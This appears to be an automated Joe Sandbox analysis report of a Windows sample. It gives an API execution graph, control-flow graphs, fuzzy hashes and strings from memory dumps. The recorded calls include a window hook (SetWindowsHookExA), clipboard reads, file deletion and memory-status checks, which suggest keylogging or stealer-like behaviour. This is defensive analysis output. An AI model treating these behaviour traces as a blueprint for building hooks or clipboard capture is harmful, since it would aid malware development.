                                                                                                                execution_graph 39544 6ea5688 39545 6ea56d8 GetModuleHandleW 39544->39545 39546 6ea56d2 39544->39546 39547 6ea5705 39545->39547 39546->39545 39548 6eaa288 39549 6eaa289 GetCurrentProcess 39548->39549 39551 6eaa320 GetCurrentThread 39549->39551 39554 6eaa319 39549->39554 39552 6eaa35d GetCurrentProcess 39551->39552 39553 6eaa356 39551->39553 39555 6eaa393 39552->39555 39553->39552 39554->39551 39556 6eaa3bb GetCurrentThreadId 39555->39556 39557 6eaa3ec 39556->39557 39558 6ea6738 39559 6ea67a0 CreateWindowExW 39558->39559 39561 6ea685c 39559->39561 39562 1968040 39563 1968086 DeleteFileW 39562->39563 39565 19680bf 39563->39565 39566 6eaa4d0 DuplicateHandle 39567 6eaa566 39566->39567 39568 6ea3cd0 39572 6ea3cde 39568->39572 39573 6ea4c4b 39572->39573 39579 6ea4c60 39572->39579 39574 6ea4c60 39573->39574 39585 6ea51e3 39574->39585 39575 6ea4d0e 39576 6ea3fb4 GetModuleHandleW 39575->39576 39577 6ea4d3a 39575->39577 39576->39577 39580 6ea4c8b 39579->39580 39584 6ea51e3 GetModuleHandleW 39580->39584 39581 6ea4d0e 39582 6ea3fb4 GetModuleHandleW 39581->39582 39583 6ea4d3a 39581->39583 39582->39583 39584->39581 39586 6ea520d 39585->39586 39587 6ea528e 39586->39587 39590 6ea534a 39586->39590 39600 6ea5350 39586->39600 39591 6ea5350 39590->39591 39593 6ea5389 39591->39593 39610 6ea3fb4 39591->39610 39594 6ea3fb4 GetModuleHandleW 39593->39594 39599 6ea5554 39593->39599 39595 6ea54da 39594->39595 39596 6ea3fb4 GetModuleHandleW 39595->39596 39595->39599 39597 6ea5528 39596->39597 39598 6ea3fb4 GetModuleHandleW 39597->39598 39597->39599 39598->39599 39599->39587 39601 6ea5365 39600->39601 39602 6ea3fb4 GetModuleHandleW 39601->39602 39603 6ea5389 39601->39603 39602->39603 39604 6ea3fb4 GetModuleHandleW 39603->39604 39609 6ea5554 39603->39609 39605 6ea54da 39604->39605 39606 6ea3fb4 GetModuleHandleW 39605->39606 39605->39609 39607 6ea5528 39606->39607 39608 6ea3fb4 GetModuleHandleW 39607->39608 39607->39609 39608->39609 39609->39587 39611 6ea5690 GetModuleHandleW 39610->39611 39613 6ea5705 39611->39613 39613->39593 39614 6eade90 39615 6eaded4 SetWindowsHookExA 39614->39615 39617 6eadf1a 39615->39617 39618 16dd030 39619 16dd048 39618->39619 39620 16dd0a2 39619->39620 39626 6ea40ec 39619->39626 39633 6ea40e4 39619->39633 39637 6ea68f0 39619->39637 39643 6eab4d0 39619->39643 39650 6ea40dc 39619->39650 39627 6ea40f7 39626->39627 39628 6eab551 39627->39628 39630 6eab541 39627->39630 39660 6eab0e0 39628->39660 39654 6eab678 39630->39654 39631 6eab54f 39634 6ea6e20 39633->39634 39741 6ea697c 39634->39741 39636 6ea6e27 39636->39620 39638 6ea6916 39637->39638 39639 6ea40dc GetModuleHandleW 39638->39639 39640 6ea6922 39639->39640 39641 6ea40ec 3 API calls 39640->39641 39642 6ea6937 39641->39642 39642->39620 39644 6eab4d5 39643->39644 39645 6eab551 39644->39645 39647 6eab541 39644->39647 39646 6eab0e0 3 API calls 39645->39646 39648 6eab54f 39646->39648 39649 6eab678 3 API calls 39647->39649 39649->39648 39651 6ea40e7 39650->39651 39652 6ea697c GetModuleHandleW 39651->39652 39653 6ea6e27 39652->39653 39653->39620 39655 6eab686 39654->39655 39656 6eab0e0 3 API calls 39655->39656 39657 6eab762 39655->39657 39667 6eabb48 39655->39667 39671 6eabb58 39655->39671 39656->39655 39657->39631 39661 6eab0eb 39660->39661 39662 6eab7ba 39661->39662 39663 6eab864 39661->39663 39665 6eab812 CallWindowProcW 39662->39665 39666 6eab7c1 39662->39666 39664 6ea40ec 2 API calls 39663->39664 39664->39666 39665->39666 39666->39631 39668 6eabb4e 39667->39668 39669 6eabb3e 39668->39669 39675 6eabd00 39668->39675 39669->39655 39672 6eabb77 39671->39672 39673 6eabc4f 39672->39673 39674 6eabd00 2 API calls 39672->39674 39673->39655 39674->39672 39676 6eabd05 39675->39676 39677 6eabd2c 39676->39677 39681 6eabd58 39676->39681 39695 6eabd4b 39676->39695 39677->39668 39678 6eabd41 39678->39668 39682 6eabd6a 39681->39682 39683 6eabd85 39682->39683 39687 6eabdc9 39682->39687 39693 6eabd4b 2 API calls 39683->39693 39694 6eabd58 2 API calls 39683->39694 39709 6eabe1b 39683->39709 39684 6eabd8b 39684->39678 39685 6eabe59 39725 6eac020 39685->39725 39687->39685 39688 6eabe53 39687->39688 39717 6eabef9 39687->39717 39721 6eabf08 39687->39721 39688->39678 39693->39684 39694->39684 39696 6eabd52 39695->39696 39697 6eabd85 39696->39697 39701 6eabdc9 39696->39701 39705 6eabe1b 2 API calls 39697->39705 39706 6eabd4b 2 API calls 39697->39706 39707 6eabd58 2 API calls 39697->39707 39698 6eabd8b 39698->39678 39699 6eabe59 39708 6eac020 OleGetClipboard 39699->39708 39700 6eabe67 39700->39678 39701->39699 39702 6eabe53 39701->39702 39703 6eabf08 OleInitialize 39701->39703 39704 6eabef9 OleInitialize 39701->39704 39702->39678 39703->39701 39704->39701 39705->39698 39706->39698 39707->39698 39708->39700 39712 6eabdf5 39709->39712 39710 6eabe59 39716 6eac020 OleGetClipboard 39710->39716 39711 6eabe67 39711->39684 39712->39709 39712->39710 39713 6eabe53 39712->39713 39714 6eabf08 OleInitialize 39712->39714 39715 6eabef9 OleInitialize 39712->39715 39713->39684 39714->39712 39715->39712 39716->39711 39718 6eabf10 39717->39718 39729 6eab35c 39718->39729 39722 6eabf10 39721->39722 39723 6eab35c OleInitialize 39722->39723 39724 6eabf19 39723->39724 39724->39687 39727 6eac035 39725->39727 39728 6eabe67 39727->39728 39737 6eab480 39727->39737 39728->39678 39730 6eab367 39729->39730 39731 6eabf19 39730->39731 39733 6eab36c 39730->39733 39731->39687 39734 6eabf80 OleInitialize 39733->39734 39736 6eabfe4 39734->39736 39736->39731 39738 6eac0c8 OleGetClipboard 39737->39738 39740 6eac162 39738->39740 39742 6ea6987 39741->39742 39743 6ea3fb4 GetModuleHandleW 39742->39743 39744 6ea6ef7 39742->39744 39743->39744 39745 1960848 39747 196084e 39745->39747 39746 196091b 39747->39746 39749 1961340 39747->39749 39751 196134f 39749->39751 39750 1961454 39750->39747 39751->39750 39755 1968219 39751->39755 39760 6ea3aa0 39751->39760 39766 6ea3a79 39751->39766 39756 1968223 39755->39756 39757 19682d9 39756->39757 39772 6ebfa48 39756->39772 39776 6ebfa58 39756->39776 39757->39751 39761 6ea3ab2 39760->39761 39764 6ea3b63 39761->39764 39780 6ea383c 39761->39780 39763 6ea3b29 39785 6ea385c 39763->39785 39764->39751 39768 6ea3ab2 39766->39768 39767 6ea3b63 39767->39751 39768->39767 39769 6ea383c GetModuleHandleW 39768->39769 39770 6ea3b29 39769->39770 39771 6ea385c KiUserCallbackDispatcher 39770->39771 39771->39767 39773 6ebfa6d 39772->39773 39774 6ebfc82 39773->39774 39775 6ebfc98 GlobalMemoryStatusEx GlobalMemoryStatusEx 39773->39775 39774->39757 39775->39773 39777 6ebfa6d 39776->39777 39778 6ebfc82 39777->39778 39779 6ebfc98 GlobalMemoryStatusEx GlobalMemoryStatusEx 39777->39779 39778->39757 39779->39777 39781 6ea3847 39780->39781 39783 6ea4c4b GetModuleHandleW 39781->39783 39784 6ea4c60 GetModuleHandleW 39781->39784 39782 6ea3d02 39782->39763 39783->39782 39784->39782 39786 6ea3867 39785->39786 39788 6eabaa3 39786->39788 39789 6eab134 39786->39789 39788->39764 39790 6eabab8 KiUserCallbackDispatcher 39789->39790 39792 6eabb26 39790->39792 39792->39786

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 124 6eb3568-6eb3589 125 6eb358b-6eb358e 124->125 126 6eb3590-6eb35af 125->126 127 6eb35b4-6eb35b7 125->127 126->127 128 6eb3d58-6eb3d5a 127->128 129 6eb35bd-6eb35dc 127->129 131 6eb3d5c 128->131 132 6eb3d61-6eb3d64 128->132 137 6eb35de-6eb35e1 129->137 138 6eb35f5-6eb35ff 129->138 131->132 132->125 134 6eb3d6a-6eb3d73 132->134 137->138 139 6eb35e3-6eb35f3 137->139 141 6eb3605-6eb3614 138->141 139->141 253 6eb3616 call 6eb3d88 141->253 254 6eb3616 call 6eb3d80 141->254 143 6eb361b-6eb3620 144 6eb362d-6eb390a 143->144 145 6eb3622-6eb3628 143->145 166 6eb3d4a-6eb3d57 144->166 167 6eb3910-6eb39bf 144->167 145->134 176 6eb39e8 167->176 177 6eb39c1-6eb39e6 167->177 179 6eb39f1-6eb3a04 call 6eb238c 176->179 177->179 182 6eb3a0a-6eb3a2c call 6eb2398 179->182 183 6eb3d31-6eb3d3d 179->183 182->183 187 6eb3a32-6eb3a3c 182->187 183->167 184 6eb3d43 183->184 184->166 187->183 188 6eb3a42-6eb3a4d 187->188 188->183 189 6eb3a53-6eb3b29 188->189 201 6eb3b2b-6eb3b2d 189->201 202 6eb3b37-6eb3b67 189->202 201->202 206 6eb3b69-6eb3b6b 202->206 207 6eb3b75-6eb3b81 202->207 206->207 208 6eb3b83-6eb3b87 207->208 209 6eb3be1-6eb3be5 207->209 208->209 210 6eb3b89-6eb3bb3 208->210 211 6eb3beb-6eb3c27 209->211 212 6eb3d22-6eb3d2b 209->212 219 6eb3bc1-6eb3bde call 6eb23a4 210->219 220 6eb3bb5-6eb3bb7 210->220 223 6eb3c29-6eb3c2b 211->223 224 6eb3c35-6eb3c43 211->224 212->183 212->189 219->209 220->219 223->224 227 6eb3c5a-6eb3c65 224->227 228 6eb3c45-6eb3c50 224->228 232 6eb3c7d-6eb3c8e 227->232 233 6eb3c67-6eb3c6d 227->233 228->227 231 6eb3c52 228->231 231->227 237 6eb3c90-6eb3c96 232->237 238 6eb3ca6-6eb3cb2 232->238 234 6eb3c6f 233->234 235 6eb3c71-6eb3c73 233->235 234->232 235->232 239 6eb3c9a-6eb3c9c 237->239 240 6eb3c98 237->240 242 6eb3cca-6eb3d1b 238->242 243 6eb3cb4-6eb3cba 238->243 239->238 240->238 242->212 244 6eb3cbe-6eb3cc0 243->244 245 6eb3cbc 243->245 244->242 245->242 253->143 254->143
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: 3e04b792aac03edb41a15e2ef2c4919ae7f2c396b89afb61b041ea9764e6cdd7
                                                                                                                • Instruction ID: 95e870700f37afec2bdceea798ef36102c14e80a69c90b8e814d860b93f56923
                                                                                                                • Opcode Fuzzy Hash: 3e04b792aac03edb41a15e2ef2c4919ae7f2c396b89afb61b041ea9764e6cdd7
                                                                                                                • Instruction Fuzzy Hash: D0322E31E1071A8FCB54DF75D8945ADB7B6FF89300F10D6AAD409AB224EB30AD85CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 940 6eb7e60-6eb7e7e 941 6eb7e80-6eb7e83 940->941 942 6eb7e85-6eb7e9f 941->942 943 6eb7ea4-6eb7ea7 941->943 942->943 944 6eb7eca-6eb7ecd 943->944 945 6eb7ea9-6eb7ec5 943->945 947 6eb7eda-6eb7edd 944->947 948 6eb7ecf-6eb7ed9 944->948 945->944 950 6eb7edf-6eb7eed 947->950 951 6eb7ef4-6eb7ef6 947->951 955 6eb7f06-6eb7f1c 950->955 958 6eb7eef 950->958 952 6eb7ef8 951->952 953 6eb7efd-6eb7f00 951->953 952->953 953->941 953->955 960 6eb7f22-6eb7f2b 955->960 961 6eb8137-6eb8141 955->961 958->951 962 6eb8142-6eb814e 960->962 963 6eb7f31-6eb7f4e 960->963 966 6eb8150 962->966 967 6eb8156-6eb8159 962->967 974 6eb8124-6eb8131 963->974 975 6eb7f54-6eb7f7c 963->975 970 6eb8152 966->970 971 6eb81a7-6eb81b4 966->971 968 6eb815a-6eb8177 967->968 973 6eb8179-6eb817c 968->973 970->968 972 6eb8154 970->972 978 6eb81bf-6eb81c1 971->978 972->967 976 6eb819f-6eb81a2 973->976 977 6eb817e-6eb819a 973->977 974->960 974->961 975->974 995 6eb7f82-6eb7f8b 975->995 976->971 979 6eb824f-6eb8252 976->979 977->976 980 6eb81d9-6eb81dd 978->980 981 6eb81c3-6eb81c9 978->981 983 6eb8258-6eb8267 979->983 984 6eb8487-6eb8489 979->984 985 6eb81eb 980->985 986 6eb81df-6eb81e9 980->986 988 6eb81cb 981->988 989 6eb81cd-6eb81cf 981->989 1001 6eb8269-6eb8284 983->1001 1002 6eb8286-6eb82ca 983->1002 992 6eb848b 984->992 993 6eb8490-6eb8493 984->993 991 6eb81f0-6eb81f2 985->991 986->991 988->980 989->980 997 6eb8209-6eb8242 991->997 998 6eb81f4-6eb81f7 991->998 992->993 993->973 994 6eb8499-6eb84a2 993->994 995->962 1000 6eb7f91-6eb7fad 995->1000 997->983 1024 6eb8244-6eb824e 997->1024 998->994 1007 6eb7fb3-6eb7fdd 1000->1007 1008 6eb8112-6eb811e 1000->1008 1001->1002 1010 6eb845b-6eb8471 1002->1010 1011 6eb82d0-6eb82e1 1002->1011 1027 6eb8108-6eb810d 1007->1027 1028 6eb7fe3-6eb800b 1007->1028 1008->974 1008->995 1010->984 1018 6eb82e7-6eb8304 1011->1018 1019 6eb8446-6eb8455 1011->1019 1018->1019 1029 6eb830a-6eb8400 call 6eb6688 1018->1029 1019->1010 1019->1011 1027->1008 1028->1027 1034 6eb8011-6eb803f 1028->1034 1078 6eb840e 1029->1078 1079 6eb8402-6eb840c 1029->1079 1034->1027 1040 6eb8045-6eb804e 1034->1040 1040->1027 1041 6eb8054-6eb8086 1040->1041 1049 6eb8088-6eb808c 1041->1049 1050 6eb8091-6eb80ad 1041->1050 1049->1027 1053 6eb808e 1049->1053 1050->1008 1051 6eb80af-6eb8106 call 6eb6688 1050->1051 1051->1008 1053->1050 1080 6eb8413-6eb8415 1078->1080 1079->1080 1080->1019 1081 6eb8417-6eb841c 1080->1081 1082 6eb842a 1081->1082 1083 6eb841e-6eb8428 1081->1083 1084 6eb842f-6eb8431 1082->1084 1083->1084 1084->1019 1085 6eb8433-6eb843f 1084->1085 1085->1019
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: e405377fb01c4c5bc98be049c503388d01e8204ec78cfc5ad9699cfe29d84987
                                                                                                                • Instruction ID: f59bdcf95ff8abf045022ccd7a915f77a155ec4c51dd359ad5defb035cad553f
                                                                                                                • Opcode Fuzzy Hash: e405377fb01c4c5bc98be049c503388d01e8204ec78cfc5ad9699cfe29d84987
                                                                                                                • Instruction Fuzzy Hash: FF02CE30B002068FDB54DF68D9946AFB7EAFF88304F14A529D5069B390DB35EC86CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a4ebe36215a02f84a807cd38837c518c1c973c32a2a019d0aa135f7115691eba
                                                                                                                • Instruction ID: 20b83207ed86a86ff6ce6972aacf727df173de4f48bc87590f44b6198fd78c1f
                                                                                                                • Opcode Fuzzy Hash: a4ebe36215a02f84a807cd38837c518c1c973c32a2a019d0aa135f7115691eba
                                                                                                                • Instruction Fuzzy Hash: 3BA22434A003048FDB64CB68C584BAEBBF2EF49318F54A4A9D549AB361DB35ED85CF41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cd8ff5e39eff437641865c3f100c344464e6a0c6258088b3c254aca2d9198022
                                                                                                                • Instruction ID: c57d339378622fd780d5e89bcaf06d03d6984bdfeaaf7f780876a6f98d43a690
                                                                                                                • Opcode Fuzzy Hash: cd8ff5e39eff437641865c3f100c344464e6a0c6258088b3c254aca2d9198022
                                                                                                                • Instruction Fuzzy Hash: 8F629E34B002059FDB54DB68D994AAEB7F2EF88314F14A469D40AEB390DB35EC46CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1a9da8f7ee7d28a6d98aa16f42bb249626e360615c6bda98b65a4c6b431c3db6
                                                                                                                • Instruction ID: 56dee1e8efecef3eadf7a385f0b5e01c58fbfebe1e4a7b3edab56f72ef55b5e1
                                                                                                                • Opcode Fuzzy Hash: 1a9da8f7ee7d28a6d98aa16f42bb249626e360615c6bda98b65a4c6b431c3db6
                                                                                                                • Instruction Fuzzy Hash: 6B32C030B002059FDF50DF68D984BAEB7B6EB88714F20A529D506EB354DB35EC42CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2aba0c9ec41e16a1db9ee7f58c3a40bc420787c372782883dfe02b0bee62a989
                                                                                                                • Instruction ID: bcaa80d09d3131e0ba605001626020a9e587c866d34ad20a62d5c5e684e9aa59
                                                                                                                • Opcode Fuzzy Hash: 2aba0c9ec41e16a1db9ee7f58c3a40bc420787c372782883dfe02b0bee62a989
                                                                                                                • Instruction Fuzzy Hash: D522F231F003159BDF64DFA4D8846AFB7A2EB85314F10A429D95AEB384DA34DC42CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7c68a4095a20d642e27002818547ba5fe7adc164aef9f4587d977003868d6d65
                                                                                                                • Instruction ID: dcb2e649f710ab348ad22dd854b5158679f27375ab76d8746fec1bf2bf6aa065
                                                                                                                • Opcode Fuzzy Hash: 7c68a4095a20d642e27002818547ba5fe7adc164aef9f4587d977003868d6d65
                                                                                                                • Instruction Fuzzy Hash: AE227030E102098FDF64DB68D9947EFB7A6EB49314F24A926E405DB391CE35DC81CB92

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 6ebada8-6ebadc6 1 6ebadc8-6ebadcb 0->1 2 6ebadee-6ebadf1 1->2 3 6ebadcd-6ebade9 1->3 4 6ebadf3-6ebadf7 2->4 5 6ebae02-6ebae05 2->5 3->2 7 6ebadfd 4->7 8 6ebafd4-6ebafde 4->8 9 6ebae07-6ebae10 5->9 10 6ebae15-6ebae18 5->10 7->5 9->10 11 6ebae1e-6ebae21 10->11 12 6ebafc5-6ebafce 10->12 15 6ebae23-6ebae30 11->15 16 6ebae35-6ebae38 11->16 12->8 14 6ebae64-6ebae6d 12->14 17 6ebafdf-6ebb016 14->17 18 6ebae73-6ebae77 14->18 15->16 19 6ebae3a-6ebae4d 16->19 20 6ebae52-6ebae55 16->20 29 6ebb018-6ebb01b 17->29 23 6ebae7c-6ebae7e 18->23 19->20 21 6ebae5f-6ebae62 20->21 22 6ebae57-6ebae5c 20->22 21->14 21->23 22->21 27 6ebae80 23->27 28 6ebae85-6ebae88 23->28 27->28 28->1 30 6ebae8e-6ebaeb2 28->30 31 6ebb02a-6ebb02d 29->31 32 6ebb01d call 6ebb2ff 29->32 47 6ebaeb8-6ebaec7 30->47 48 6ebafc2 30->48 33 6ebb033-6ebb06e 31->33 34 6ebb296-6ebb299 31->34 38 6ebb023-6ebb025 32->38 45 6ebb261-6ebb274 33->45 46 6ebb074-6ebb080 33->46 36 6ebb29b-6ebb2a5 34->36 37 6ebb2a6-6ebb2a9 34->37 39 6ebb2ab-6ebb2c7 37->39 40 6ebb2cc-6ebb2cf 37->40 38->31 39->40 43 6ebb2d1-6ebb2d5 40->43 44 6ebb2e0-6ebb2e2 40->44 43->33 50 6ebb2db 43->50 51 6ebb2e9-6ebb2ec 44->51 52 6ebb2e4 44->52 53 6ebb276 45->53 60 6ebb082-6ebb09b 46->60 61 6ebb0a0-6ebb0e4 46->61 57 6ebaec9-6ebaecf 47->57 58 6ebaedf-6ebaf1a call 6eb6688 47->58 48->12 50->44 51->29 56 6ebb2f2-6ebb2fc 51->56 52->51 53->34 62 6ebaed3-6ebaed5 57->62 63 6ebaed1 57->63 75 6ebaf1c-6ebaf22 58->75 76 6ebaf32-6ebaf49 58->76 60->53 77 6ebb100-6ebb13f 61->77 78 6ebb0e6-6ebb0f8 61->78 62->58 63->58 79 6ebaf26-6ebaf28 75->79 80 6ebaf24 75->80 90 6ebaf4b-6ebaf51 76->90 91 6ebaf61-6ebaf72 76->91 84 6ebb226-6ebb23b 77->84 85 6ebb145-6ebb220 call 6eb6688 77->85 78->77 79->76 80->76 84->45 85->84 93 6ebaf53 90->93 94 6ebaf55-6ebaf57 90->94 97 6ebaf8a-6ebafbb 91->97 98 6ebaf74-6ebaf7a 91->98 93->91 94->91 97->48 99 6ebaf7e-6ebaf80 98->99 100 6ebaf7c 98->100 99->97 100->97
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: e9d1b059e0abba8288b2e2f1f930f51757da8443d3437765c287ea2c7235186c
                                                                                                                • Instruction ID: 3cc174e17fbb04af14d01e03bab529f4cd9624f0658f10a1a263d24881f1bab0
                                                                                                                • Opcode Fuzzy Hash: e9d1b059e0abba8288b2e2f1f930f51757da8443d3437765c287ea2c7235186c
                                                                                                                • Instruction Fuzzy Hash: 25E13C30E1030A8FDF65DF68D5846AEB7A6EB84304F20A529D40AAB354DF35EC46CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: 829e287e7f247558979b44322948316c140b2292ea2e2dfa29cac48d15e335dc
                                                                                                                • Instruction ID: 59c135582d89f369cfb7cf160aa9800c7d1651b7ade890135ee2ffb2802141b4
                                                                                                                • Opcode Fuzzy Hash: 829e287e7f247558979b44322948316c140b2292ea2e2dfa29cac48d15e335dc
                                                                                                                • Instruction Fuzzy Hash: C2025B30E002098FDBA4DF68D9806AEB7B2FB85308F24A96AD405DB355DF35DC85CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 427 6eaa247-6eaa249 428 6eaa24b-6eaa270 427->428 429 6eaa2ae-6eaa317 GetCurrentProcess 427->429 433 6eaa272-6eaa2ab 428->433 434 6eaa265-6eaa269 428->434 440 6eaa319-6eaa31f 429->440 441 6eaa320-6eaa354 GetCurrentThread 429->441 433->429 440->441 442 6eaa35d-6eaa391 GetCurrentProcess 441->442 443 6eaa356-6eaa35c 441->443 445 6eaa39a-6eaa3b5 call 6eaa458 442->445 446 6eaa393-6eaa399 442->446 443->442 449 6eaa3bb-6eaa3ea GetCurrentThreadId 445->449 446->445 450 6eaa3ec-6eaa3f2 449->450 451 6eaa3f3-6eaa455 449->451 450->451
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA306
                                                                                                                • GetCurrentThread.KERNEL32 ref: 06EAA343
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA380
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 06EAA3D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 0ef6209604d9ffdf0dd6b80ecb63813b90017b7191d78d006734a93ff8e9f60c
                                                                                                                • Instruction ID: 2c9e973a18cf66d618b6f9109a1fde9a2a8975216227eced4287650317c7983e
                                                                                                                • Opcode Fuzzy Hash: 0ef6209604d9ffdf0dd6b80ecb63813b90017b7191d78d006734a93ff8e9f60c
                                                                                                                • Instruction Fuzzy Hash: 425167B0901349CFDB44DFAAD948BEEBBF1FF49304F24806AD049AB260D7356848CB65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 458 6eaa257-6eaa270 460 6eaa272-6eaa317 GetCurrentProcess 458->460 461 6eaa265-6eaa269 458->461 469 6eaa319-6eaa31f 460->469 470 6eaa320-6eaa354 GetCurrentThread 460->470 469->470 471 6eaa35d-6eaa391 GetCurrentProcess 470->471 472 6eaa356-6eaa35c 470->472 474 6eaa39a-6eaa3b5 call 6eaa458 471->474 475 6eaa393-6eaa399 471->475 472->471 478 6eaa3bb-6eaa3ea GetCurrentThreadId 474->478 475->474 479 6eaa3ec-6eaa3f2 478->479 480 6eaa3f3-6eaa455 478->480 479->480
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA306
                                                                                                                • GetCurrentThread.KERNEL32 ref: 06EAA343
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 06EAA380
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 06EAA3D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 3c2c4604878f948ca9eef348a5973390fc9aedf0d2524bd5468702ddf9c2082b
                                                                                                                • Instruction ID: f726cf222c2e9f0edf65a2aca3543eabb324d78df5a33d5c70b9080a605b57a6
                                                                                                                • Opcode Fuzzy Hash: 3c2c4604878f948ca9eef348a5973390fc9aedf0d2524bd5468702ddf9c2082b
                                                                                                                • Instruction Fuzzy Hash: 635158B0901349CFDB54DFAAD948B9EBBF1FF49304F24806AD059AB360D7346848CB65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
